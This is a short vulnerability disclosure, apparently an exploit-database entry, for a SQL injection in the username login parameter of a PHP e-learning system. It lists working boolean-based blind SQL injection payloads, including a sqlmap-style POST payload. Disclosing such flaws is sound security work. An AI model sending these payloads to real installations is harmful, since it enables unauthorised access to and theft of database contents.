## Title: elearning-SES (by: oretnom23 ) v1.0 Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.14.2023
## Vendor: https://github.com/oretnom23
## Software: https://github.com/oretnom23/php-elearning-system
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The username parameter appears to be vulnerable to SQL injection
attacks. The payloads 73152795' or 7515=7515-- and 13684562' or
3996=3998-- were each submitted in the username parameter. These two
requests resulted in different responses, indicating that the input is
being incorporated into a SQL query in an unsafe way. The attacker can
easily steal all information from the database of this system.

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-5075' OR 6057=6057-- JyxE&password=s8S!g3w!I2
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/elearning_1)

## Proof and Exploit:
[href]()

## Time spend:
01:15:00